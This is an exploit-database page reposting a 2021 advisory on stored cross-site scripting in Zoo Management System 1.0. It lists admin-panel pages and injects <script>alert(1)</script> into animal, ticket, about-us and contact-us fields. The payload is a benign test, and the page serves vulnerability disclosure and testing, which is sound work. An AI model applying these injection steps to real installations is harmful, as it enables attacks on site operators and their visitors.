Advertisement






Zoo Management System 1.0 Cross Site Scripting

CVE Category Price Severity
Author Risk Exploitation Type Date
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021070058

Below is a copy:

Zoo Management System 1.0 Cross Site Scripting
# Exploit Title: Zoo Management System 1.0 - 'Multiple' Stored Cross-Site-Scripting (XSS)
# Date: 08/07/2021
# Exploit Author: Subhadip Nag
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Server: XAMPP

# Description #

Zoo Management System 1.0 is vulnerable to 'Multiple' stored cross site scripting because of insufficient user supplied data.

# Proof of Concept (PoC) : Exploit #

1) Goto: http://localhost/ZMSP/zms/admin/index.php  and  Login(given User & password)
2) Goto: http://localhost/ZMSP/zms/admin/add-animals.php
3) Fill out Animal name, Breed and Description with given payload: <script>alert(1)</script>
4) Goto: http://localhost/ZMSP/zms/admin/manage-animals.php
5) Stored XSS payload is fired

6) Goto: http://localhost/ZMSP/zms/admin/manage-ticket.php
7) Edit any Action field with the following payload: <script>alert(1)</script> and Update
8) Go back and again click 'Manage Type Ticket'
9) Stored XSS payload is fired

10) Goto: http://localhost/ZMSP/zms/admin/aboutus.php 
11) In the Page 'Title' & 'Description',Enter the Payload: <script>alert(1)</script> and Click Update

12) Goto: http://localhost/ZMSP/zms/admin/contactus.php
13) Put the Same Payload in the Page 'Title' & 'Description' and Click Update 
14) Logout and click 'Back Home'
15) Our XSS payload successful
  

# Image PoC : Reference Image #

1) https://ibb.co/g4hFQDV
2) https://ibb.co/frbpf9c
3) https://ibb.co/NtKrc9C
4) https://ibb.co/cFGWhCz
4) https://ibb.co/CMXmN4f
5) https://ibb.co/C0dV0PC
6) https://ibb.co/4ZW8tb3
7) https://ibb.co/3zgFq9b
8) https://ibb.co/wS8wXj8

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum